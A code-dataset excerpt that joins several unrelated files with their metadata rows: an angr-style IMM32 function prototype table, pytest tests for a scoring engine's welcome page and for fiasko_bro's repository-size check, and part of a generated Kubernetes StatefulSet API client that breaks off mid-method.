'ImmGetRegisterWordStyleA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "szDescription": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 32)}, name="STYLEBUFA", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "nItem", "lpStyleBuf"]),
#
'ImmGetRegisterWordStyleW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "szDescription": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 32)}, name="STYLEBUFW", pack=False, align=None), label="LPArray", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "nItem", "lpStyleBuf"]),
#
'ImmEnumRegisterWordA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszReading", "param1", "lpszString", "param3"]), offset=0), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Byte"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpszReading", "param3", "lpszRegister", "param5"]),
#
'ImmEnumRegisterWordW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["lpszReading", "param1", "lpszString", "param3"]), offset=0), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeChar(label="Char"), offset=0), SimTypePointer(SimTypeBottom(label="Void"), offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "lpszReading", "param3", "lpszRegister", "param5"]),
#
'ImmDisableIME': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmEnumInputContext': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]), offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["idThread", "lpfn", "lParam"]),
#
'ImmGetImeMenuItemsA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOA", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeBottom(label="CHAR"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOA", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2", "lpImeParentMenu", "lpImeMenu", "dwSize"]),
#
'ImmGetImeMenuItemsW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOW", pack=False, align=None), offset=0), SimTypePointer(SimStruct({"cbSize": SimTypeInt(signed=False, label="UInt32"), "fType": SimTypeInt(signed=False, label="UInt32"), "fState": SimTypeInt(signed=False, label="UInt32"), "wID": SimTypeInt(signed=False, label="UInt32"), "hbmpChecked": SimTypeBottom(label="HBITMAP"), "hbmpUnchecked": SimTypeBottom(label="HBITMAP"), "dwItemData": SimTypeInt(signed=False, label="UInt32"), "szString": SimTypeFixedSizeArray(SimTypeChar(label="Char"), 80), "hbmpItem": SimTypeBottom(label="HBITMAP")}, name="IMEMENUITEMINFOW", pack=False, align=None), offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0", "param1", "param2", "lpImeParentMenu", "lpImeMenu", "dwSize"]),
#
'ImmDisableTextFrameService': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypeInt(signed=True, label="Int32"), arg_names=["idThread"]),
#
'ImmDisableLegacyIME': SimTypeFunction([], SimTypeInt(signed=True, label="Int32")),
#
'ImmGetHotKey': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt32"), offset=0), SimTypePointer(SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "lpuModifiers", "lpuVKey", "phKL"]),
#
'ImmSetHotKey': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmGenerateMessage': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmRequestMessageA': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2"]),
#
'ImmRequestMessageW': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypePointer(SimTypeInt(signed=False, label="UInt"), label="UIntPtr", offset=0), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2"]),
#
'ImmCreateSoftKeyboard': SimTypeFunction([SimTypeInt(signed=False, label="UInt32"), SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32"), SimTypeInt(signed=True, label="Int32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1", "param2", "param3"]),
#
'ImmDestroySoftKeyboard': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmShowSoftKeyboard': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=True, label="Int32")], SimTypeInt(signed=True, label="Int32"), arg_names=["param0", "param1"]),
#
'ImmLockIMC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimStruct({"hWnd": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "fOpen": SimTypeInt(signed=True, label="Int32"), "ptStatusWndPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "ptSoftKbdPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "fdwConversion": SimTypeInt(signed=False, label="UInt32"), "fdwSentence": SimTypeInt(signed=False, label="UInt32"), "lfFont": SimUnion({"A": SimTypeBottom(label="LOGFONTA"), "W": SimTypeBottom(label="LOGFONTW")}, name="<anon>", label="None"), "cfCompForm": SimStruct({"dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="COMPOSITIONFORM", pack=False, align=None), "cfCandForm": SimTypeFixedSizeArray(SimStruct({"dwIndex": SimTypeInt(signed=False, label="UInt32"), "dwStyle": SimTypeInt(signed=False, label="UInt32"), "ptCurrentPos": SimStruct({"x": SimTypeInt(signed=True, label="Int32"), "y": SimTypeInt(signed=True, label="Int32")}, name="POINT", pack=False, align=None), "rcArea": SimStruct({"left": SimTypeInt(signed=True, label="Int32"), "top": SimTypeInt(signed=True, label="Int32"), "right": SimTypeInt(signed=True, label="Int32"), "bottom": SimTypeInt(signed=True, label="Int32")}, name="RECT", pack=False, align=None)}, name="CANDIDATEFORM", pack=False, align=None), 4), "hCompStr": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hCandInfo": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hGuideLine": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "hPrivate": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "dwNumMsgBuf": SimTypeInt(signed=False, label="UInt32"), "hMsgBuf": SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), "fdwInit": SimTypeInt(signed=False, label="UInt32"), "dwReserve": SimTypeFixedSizeArray(SimTypeInt(signed=False, label="UInt32"), 3)}, name="INPUTCONTEXT", pack=False, align=None), offset=0), arg_names=["param0"]),
#
'ImmUnlockIMC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetIMCLockCount': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmCreateIMCC': SimTypeFunction([SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmDestroyIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0"]),
#
'ImmLockIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypePointer(SimTypeBottom(label="Void"), offset=0), arg_names=["param0"]),
#
'ImmUnlockIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=True, label="Int32"), arg_names=["param0"]),
#
'ImmGetIMCCLockCount': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
#
'ImmReSizeIMCC': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), SimTypeInt(signed=False, label="UInt32")], SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0), arg_names=["param0", "param1"]),
#
'ImmGetIMCCSize': SimTypeFunction([SimTypePointer(SimTypeInt(signed=True, label="Int"), label="IntPtr", offset=0)], SimTypeInt(signed=False, label="UInt32"), arg_names=["param0"]),
}
lib.set_prototypes(prototypes)
| 213.048387 | 2,730 | 0.717945 | 4,215 | 39,627 | 6.721234 | 0.066429 | 0.219696 | 0.158842 | 0.198553 | 0.914649 | 0.905895 | 0.901553 | 0.895941 | 0.893823 | 0.890399 | 0 | 0.0248 | 0.086229 | 39,627 | 185 | 2,731 | 214.2 | 0.757581 | 0.000707 | 0 | 0 | 0 | 0 | 0.21094 | 0.017498 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.052083 | 0 | 0.052083 | 0 | 0 | 0 | 0 | null | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
57c47aeb021b4360f14199fde6b996fb91b4adbd | 1,519 | py | Python | tests/scoring_engine/web/test_welcome.py | yeyintminthuhtut/scoring_engine | 679021c00fcab5032078665d17d4b102346347f1 | [
"MIT"
] | 1 | 2021-01-11T07:10:42.000Z | 2021-01-11T07:10:42.000Z | tests/scoring_engine/web/test_welcome.py | yeyintminthuhtut/scoring_engine | 679021c00fcab5032078665d17d4b102346347f1 | [
"MIT"
] | null | null | null | tests/scoring_engine/web/test_welcome.py | yeyintminthuhtut/scoring_engine | 679021c00fcab5032078665d17d4b102346347f1 | [
"MIT"
] | null | null | null | from collections import OrderedDict
from tests.scoring_engine.web.web_test import WebTest
class TestWelcome(WebTest):
def setup(self):
super(TestWelcome, self).setup()
self.expected_sponsorship_images = OrderedDict()
self.expected_sponsorship_images['diamond'] = ['/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg']
self.expected_sponsorship_images['platinum'] = ['/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg']
self.expected_sponsorship_images['somecustomlevel'] = ['/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg']
self.expected_sponsorship_images['gold'] = ['/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg', '/static/images/logo-placeholder.jpg']
def test_home(self):
resp = self.client.get('/')
assert self.mock_obj.call_args == self.build_args('welcome.html', sponsorship_images=self.expected_sponsorship_images)
assert resp.status_code == 200
def test_home_index(self):
resp = self.client.get('/index')
assert self.mock_obj.call_args == self.build_args('welcome.html', sponsorship_images=self.expected_sponsorship_images)
assert resp.status_code == 200
| 60.76 | 296 | 0.734694 | 185 | 1,519 | 5.875676 | 0.232432 | 0.165593 | 0.220791 | 0.372585 | 0.74977 | 0.711132 | 0.711132 | 0.711132 | 0.711132 | 0.711132 | 0 | 0.004488 | 0.119816 | 1,519 | 24 | 297 | 63.291667 | 0.808527 | 0 | 0 | 0.222222 | 0 | 0 | 0.388413 | 0.345622 | 0 | 0 | 0 | 0 | 0.222222 | 1 | 0.166667 | false | 0 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
57dcb5218ac750358557e96d66ffb2f0f4e9287e | 1,403 | py | Python | tests/test_size_validators/test_are_repos_too_large.py | SerejkaSJ/fiasko_bro | dfb8c30109f317c1e5b6d211e002fd148695809e | [
"MIT"
] | 25 | 2018-01-24T10:45:35.000Z | 2020-12-05T21:47:20.000Z | tests/test_size_validators/test_are_repos_too_large.py | SerejkaSJ/fiasko_bro | dfb8c30109f317c1e5b6d211e002fd148695809e | [
"MIT"
] | 110 | 2018-01-21T12:25:13.000Z | 2021-06-10T19:27:22.000Z | tests/test_size_validators/test_are_repos_too_large.py | SerejkaSJ/fiasko_bro | dfb8c30109f317c1e5b6d211e002fd148695809e | [
"MIT"
] | 13 | 2017-12-12T22:19:01.000Z | 2019-01-29T18:08:05.000Z | from fiasko_bro.pre_validation_checks import repo_is_too_large
from fiasko_bro import defaults
def test_repo_size_fail_single(general_repo_path):
max_py_files_count = 1
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(general_repo_path, directories_to_skip, max_py_files_count)
assert isinstance(output, str)
def test_repo_size_fail_double(general_repo_path, general_repo_origin_path):
max_py_files_count = 1
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(
general_repo_path,
directories_to_skip,
max_py_files_count,
general_repo_origin_path
)
assert isinstance(output, str)
def test_repo_size_ok_single(general_repo_path):
max_py_files_count = 1000
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(general_repo_path, directories_to_skip, max_py_files_count)
assert output is None
def test_repo_size_ok_double(general_repo_path, general_repo_origin_path):
max_py_files_count = 1000
directories_to_skip = defaults.VALIDATION_PARAMETERS['directories_to_skip']
output = repo_is_too_large(
general_repo_path,
directories_to_skip,
max_py_files_count,
general_repo_origin_path
)
assert output is None
| 34.219512 | 90 | 0.788311 | 200 | 1,403 | 4.955 | 0.185 | 0.133199 | 0.205853 | 0.12109 | 0.896065 | 0.853683 | 0.853683 | 0.853683 | 0.750757 | 0.750757 | 0 | 0.008496 | 0.161083 | 1,403 | 40 | 91 | 35.075 | 0.833475 | 0 | 0 | 0.75 | 0 | 0 | 0.05417 | 0 | 0 | 0 | 0 | 0 | 0.125 | 1 | 0.125 | false | 0 | 0.0625 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
a4e72c9c93c21a8687f6624b358df57934c003ab | 93,549 | py | Python | k8sclient/apis/apps_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | 1 | 2021-06-16T02:57:18.000Z | 2021-06-16T02:57:18.000Z | k8sclient/apis/apps_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | null | null | null | k8sclient/apis/apps_v1alpha1_api.py | Arvinhub/client-python | d67df30f635231d68dc4c20b9b7e234c616c1e6a | [
"Apache-2.0"
] | null | null | null | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: unversioned
Generated by: https://github.com/swagger-api/swagger-codegen.git
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from __future__ import absolute_import
import sys
import os
import re
# python 2 and python 3 compatibility library
from six import iteritems
from ..configuration import Configuration
from ..api_client import ApiClient
class AppsV1alpha1Api(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
config = Configuration()
if api_client:
self.api_client = api_client
else:
if not config.api_client:
config.api_client = ApiClient()
self.api_client = config.api_client
def create_apps_v1alpha1_namespaced_stateful_set(self, namespace, body, **kwargs):
"""
create a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_apps_v1alpha1_namespaced_stateful_set(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, **kwargs)
else:
(data) = self.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, **kwargs)
return data
def create_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, namespace, body, **kwargs):
"""
create a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.create_apps_v1alpha1_namespaced_stateful_set_with_http_info(namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `create_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `create_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_apps_v1alpha1_collection_namespaced_stateful_set(self, namespace, **kwargs):
"""
delete collection of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_collection_namespaced_stateful_set(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, **kwargs)
else:
(data) = self.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, **kwargs)
return data
def delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(self, namespace, **kwargs):
"""
delete collection of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_collection_namespaced_stateful_set_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'pretty', 'field_selector', 'label_selector', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_apps_v1alpha1_collection_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `delete_apps_v1alpha1_collection_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='UnversionedStatus',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def delete_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
"""
delete a StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.delete_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1DeleteOptions body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: UnversionedStatus
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.delete_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
else:
